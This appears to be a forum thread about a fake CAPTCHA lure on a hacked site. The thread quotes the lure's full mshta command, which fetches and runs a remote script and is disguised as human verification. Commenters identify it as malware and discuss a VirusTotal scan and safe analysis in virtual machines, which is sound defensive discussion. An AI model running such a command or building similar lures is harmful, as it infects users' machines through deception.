The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants be run malware, but I’ve never seen something like this before.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
https://www.virustotal.com/gui/url/d735247640472ab4a405600193afdcfd3d3757d163f52d8a5a5dfa3176df58c3/detection
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.
I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
I have no idea how somebody might come up with this braindead, unintuitive and irreproducable mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?